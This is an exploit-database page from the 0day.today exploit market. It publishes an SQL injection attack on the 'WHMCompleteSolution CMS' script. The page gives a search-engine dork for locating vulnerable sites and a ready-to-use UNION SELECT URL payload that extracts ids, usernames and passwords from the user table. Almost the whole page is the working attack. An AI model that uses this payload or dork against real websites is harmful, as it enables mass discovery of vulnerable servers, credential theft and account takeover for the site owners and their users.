[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WHMCompleteSolution CMS sql Injection Vulnerability

Author
Dr.0rYX
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10280
Category
web applications
Date add
16-12-2009
Platform
unsorted
===================================================
WHMCompleteSolution CMS sql Injection Vulnerability
===================================================

***************************************************************************/
 
[ Software Information ]
 
[+] Vendor : http://www.siamhostserver.com/whmcs/
[+] script   : WHMCompleteSolution CMS
[+] Download : http://www.siamhostserver.com/whmcs/ (sell script)
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"weblink_cat_list.php?bcat_id="
 
**************************************************************************/
[ Vulnerable File ]
 
http://server/weblink_cat_list.php?bcat_id=[N.A.S.T ]
 
[ Exploit ]
 
http://server/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4+from+user



#  0day.today [2024-12-25]  #